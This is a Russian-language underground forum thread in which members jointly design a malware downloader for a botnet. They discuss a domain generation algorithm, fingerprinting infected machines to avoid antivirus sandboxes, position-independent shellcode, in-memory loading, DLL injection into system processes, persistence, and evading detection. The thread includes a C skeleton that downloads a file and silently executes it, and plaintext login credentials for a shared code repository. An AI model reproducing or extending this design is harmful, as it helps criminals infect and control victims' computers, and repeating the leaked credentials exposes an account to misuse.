Разработка DL лоадера

тогда у людей изменится представление о самом "привате" :)
остались те, кому всё еще эта и околомалварные темы интересны тут?

квак же тут, у него доступ сюда есть?
крем появится, думаю заинтересуется, гринзи, ваху, рагнар, паук.. по сути все же тут...

p.s.Ar3s есть контакт краза?

[mod][Ar3s:] 1. у кваки доступ есть
2. Краз оставлял контакт, но не могу найти. Да и старый контакт совсем был.[/mod]

Пожалуйста, обратите внимание, что пользователь заблокирован
Я практически не занимался доработкой своего лоадера, начиная с декабря 12 года где-то. Сначала кодил кое что на пхп на заказ, после лечился какое-то время. Но кое что есть, в ближайшие дни напишу в паблик теме свои наработки (в приватах нет смысла).

Но это только немного, а что дальше - хз. Например, загрузку из памяти, ssl и прочие элитные идеи, озвученные в этой теме, я тупо не осилю, по крайней мере на данном этапе.

опять же, обсуждали уже, всякие тех. фишки это дело второе, вначале нужно решить организационные проблемы, а именно прийти к соглашению в тз ( хотя бы в общие пункты работы, не затрагиваю реализацию ), выбрать язык на котором это все будет писаться, и разобрать примерно кто что хочет/будет делать ... а потом уже пытаться придумать интерфейсы дабы все это связать ...

и только потом кто то работающий над связью/протоколом спросит, а как мол лучше сделать ссл, через cryptoApi+сокеты, wininet/winhttp, COM или еще как то ...

demien
с dll я сейчас пробую разобраться, там действительно не такая уж проблема. Но - dll грузить проще. А если ехе, в котором будут какие-то нюансы типа tls, релоки или еще черт знает что, то мне такое не под силу. Я РЕ формат только недавно изучаю, и то, изучил весьма поверхностно и слабо.

el-
Пока писал предыдущее, появился твой пост. По ТЗ..если вкратце, из того, что помню:
1. Надо сделать генерацию доменов, в зависимости от недели в году, например + какой-то ключ. Как это сделать - в теории понимаю, на практике надо накодить генератор псевдо-случайных чисел, чтобы и в боте он был, и у ботовода, и чтобы это работало синхронно.
Я считаю, что надо обязательно делать генератор доменов, а не парсер выдачи гугла и прочую ахинею. Как уже кто-то писал в этой теме (вроде эль), если вдруг завтра гугл изменит алгоритм выдачи, ботнет пропадет. И такое может быть, да банально капча - у меня с моего ип иногда гугл просит ввести капчу. Попадет бот на такое, и все, лишились какого-то % загрузок. Поэтому надо только генерить домены, а не парсить выдачу гугла или еще что.

2. Надо написать бот, который будет прогружатся и получать инфу о зараженной машине (идея el-). Опять же - что получать? Список процессов, служб, установленные программы, место на диске, etc. Отправлять на сервер, где админка решит - машина аверская прокладка, или можно туда прогружать нормальный софт. Тут опять же, как быть - или сама админка должна решать, тогда надо "обучать" подобие ИИ в админке, чтобы он принимал решение (подобие эвристика, вида - если есть такой процесс + процессор слабее 2ггц + еще что - не прогружаем, вероятно реверс). Но тут может быть потеря загрузок, из-за ошибок. Или же вручную "одобрять", что не вариант при прогрузах тысяч ботов.

Это из того, что мог бы написать лично я, все иное - загрузка из памяти, инжекты, полиморфы я не осилю на нормальном уровне.

По ЯП - я могу Масм, ну или в крайнем случае Си. С++ (ООП) не знаю вообще, как и дельфи.

Давайте так... пока отложем генерацию доменов етц...
Сам код загрузчика (читай даунлоадера) будет кусокм базанезависимого си++ кода, превращенного в шк, это наиудобнейший формат работы. Вставляй буфер хоть в масме, хоть в фасме, и запускай, короче как мотор. Второй этап это пе лоадер, возьмем лоадер грита, с дллками от вполне сносно справляется, с ехе другая конитель. Ехе нам и не надо!

С шк тоже всё просто, через пеб ищем базу кернела, далее в экспорте по хэшу находим GetProcAddress, или пилим свой... Далее через че будем качать? рав сокеты, вининет или баналньый UrlDownloadToFileA?

demien
Второй этап это пе лоадер, возьмем лоадер грита, с дллками от вполне сносно справляется, с ехе другая конитель. Ехе нам и не надо
Я это немного не пойму. С памяти предполагается запускать свои плагины, или, собственно, чужие ехе (которые лоадер будет прогружать)? Если свои длл ,то проблем нет, если чужие ехе - то надо очень много отлаживать в таком случае.
Вроде как же аверы палят создание нового процесса, поэтому лучше запускать малварку в своем. Или я что-то путаю?
Далее через че будем качать? рав сокеты, вининет или баналньый UrlDownloadToFileA?
UrlDownloadToFile или вининет. Тут есть несколько критириев, по которым надо выбрать:
1. Чтобы апи автоматом брали настройки с реестра или откуда там, если соединение идет через прокси. Сокеты такое не могут.
2. Поддержка ssl. Опять же, на сокетах это гемор.
3. Ну и эти апи дают более правдоподобный и похожий на настоящий хттп трафик, чем сокеты, ибо можно юзать чанки, гзип и так далее.
Единственное, я не знаю как работает UrlDownloadToFile - в плане, берет ли оно настройки с реестра, или если на компе корп. прокси, то не скачает. Минус единственный - если будем грузить ехе с памяти, то это апи не подойдет, тогда вининет.

Сокеты в своем лоадере (имею ввиду тот пример кода в паблике) я юзал исключительно для обучения кодингу на сокетах, в реальном проекте они могут вызвать проблемы, лучше взять тысячи раз отлаженные и проверенные апи, чем винсок.

Пока пускай запускаются плагинные длл модули. Сам лоадер пускай робит через вининет, дропает на хард, оттуда Шелексекут RunAs...
Всё это обернем в шк, дальше будем смотреть..

Ок пусть будет си, вот наибанальнейший кусок кода, возьмем его как скелет.
Малоки и фри заменим на VirtualAlloc и VirtualFree, не суть.
Указатели на апи, дабы не нести лишнего импорта можно искать самописной функой xGetProcAddress, находить базу кернел32 будем через пеб, парсить экспорт етц...

Код:
#define MAXBUFF (512 * 1024)

void DownloadFile (char *url, char *dest) 
{

HINTERNET hRequest, hDownload;

HANDLE hFile;

int read, read2, ret = -1;
	char *buf;

hRequest = InternetOpen (USER, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

hDownload = InternetOpenUrl (hRequest, url, NULL, 0, INTERNET_FLAG_NO_UI | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, NULL);

if (hDownload) {
  hFile = CreateFile (dest, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, 0, NULL);
  if (!hFile)
  	goto EndOfWork;
  buf = malloc (DOWNLOAD_MAXBUFF);
  do {
  	putchar ('.');
  	InternetReadFile (hDownload, buf, MAXBUFF, &read);
  	WriteFile (hFile, buf, read, &read2, NULL);
  }
 while (read == read2 && read == MAXBUFF);
  if (read == read2)
  	ret = 0;

}

EndOfWork:
	free (buf);
	CloseHandle (hFile);
	InternetCloseHandle (hDownload);
	InternetCloseHandle (hRequest);

ShellExecute(NULL, "open", dest, NULL, NULL, NULL, 0);

ExitProcess(0);
}

....

>>Ок пусть будет си
я не про то, мне наоборот нравиться с++

>>будет кусокм базанезависимого си++ кода, превращенного в шк
зачем эти извращения с шк

>>это наиудобнейший формат работы.
и чем это удобно

я не про то, мне наоборот нравиться с++
ок

зачем эти извращения с шк
и чем это удобно
затем что кто-то пилит на фасме, кто-то на масме, кто-то на си
шк как временный двиг, вокруг которого можно всё остальное дальше пилить

в целом код-скелет дан, что дальше?

Давайте выберем сетевые апи. Я склоняюсь к вининет/винхттп (это хуже, ибо только юникод), но нужно мнение специалистов. Что лучше, что меньше палится, что имеет больше функционала и гибкости?

http://github.com/
login: damaga
password: 00vrq9wrv9288823

Создайте репозиторий лоадера Dloader
И пихайте в него кодес.

Если кто-то сменит пасс - будет крайне п#даристически...

Имхо, лоадер должен представлять из себя EXE, который выплёвывает из себя DLL, при чём шифрует её, используя в качестве ключа аппаратные характеристики системы, на которой запускается EXE, после чего EXE умирает.
Возникли некоторые вопросы.
1. Что именно шифровать в dll? Т.е. какой именно раздел РЕ файла должен быть пошифрован дроппером? ведь нельзя поксорить весь файл, иначе он не будет работать, ровно как и поксорить там секцию данных или еще что. Можно подробней на эту тему?

2. Как обеспечить автозагрузку дллки? Т.е. дроппер скачал дллку, заинжектил ее в адресное пространство эксплорера или свцхост, а сам самоудалился. Все работает, но как только юзер выключит/перезагрузит комп, дллка сама по себе же не подключится опять к процессу. Как здесь быть? AppInit_DLLs не предлагать, так как они или отключены с виста+, или требуют цифровой подписи (точно не помню, но там с ними какая-то проблема есть). + загрузка сразу во все процессы, как по мне, не есть хорошо.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх